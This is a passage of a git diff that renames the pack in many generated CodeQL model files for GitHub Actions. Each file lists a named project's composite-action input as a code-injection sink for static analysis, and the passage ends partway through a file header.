index af21dca8205..19d14bbe988 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 18fdeffe1ec..0308c934d7e 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index ee67e882174..6039a6c3628 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 49caeb5f1dc..4962f4f6281 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index dda74b285da..91c9e22df2a 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 4b144103f8f..760858b7eec 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 931658c0bb5..8d219108234 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index f2963217662..e889a394563 100644 
--- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 1578e397369..8f96daba8df 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 17c45e0d8ed..1e73f98b3d3 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 4e26b872800..c92eb434d47 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index d5fa53d1bbb..9de3892ac0c 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index f90fb1c5e63..2ae0b823187 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index d16c0792c6d..8e2744b2de7 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index 4d009c2d47d..bf2e23efba8 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index afd875c2205..d8d86591302 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index 680bbe27bcb..1ac30a3790e 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index ffe074d3dea..1c05276abe0 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index e53a58412c9..c4b67ad5c58 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index a899f727e39..a4400dde9d4 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 0c7c2e1bded..8b5566b4996 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 3d631e60dc3..349f66f4387 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index 2f8710d2cbd..f717bf5c5d8 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index 5490e62cdc9..b2a851a0dba 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 0c6df201a1c..054af41f284 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 7d0b894f35d..31eeed0d251 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index d85418c7a41..97adf115bd2 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 074cf066e37..926230e2282 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index c4497b59af8..0827f770e31 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index cc28e15a55b..9314532b426 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 76fb41dadf1..961ad291c0d 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index b786a672140..d2a963c237e 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 236ac8f2cd2..809fde33877 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 64207dbca6a..002a93c1249 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 46de0ff86c6..67404b9f311 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index a07b223777b..e4eb1d83db2 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index e3470982f53..fc29f5fc8ff 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 87535288d26..352d2550b89 100644 
--- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 28249c82428..954216bb04e 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 8d1bbce631f..dcb26733160 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 3c5f85a6e79..4608da8fe61 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index 01a552361ec..e38ba9b4edf 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index ab2e86ce868..48a1bb5ca8b 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 8d6dd73bfd9..744b025fa65 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index a20cbb1e24d..d6c91a3853c 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 62785bef86b..e49d896bce0 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 9c10a54abc7..66240fb41c3 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index 4145ec19569..e9fbe3a2950 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index 5b63c9fec06..bd94706b140 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index f21389b08b0..39324776e80 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 1a6f42c25f6..80c781f72df 100644 
--- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index ea48b84310c..abee0f74453 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 4e953d695f8..9a20261be90 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 32040ef84ea..a8c9d3fabce 100644 --- 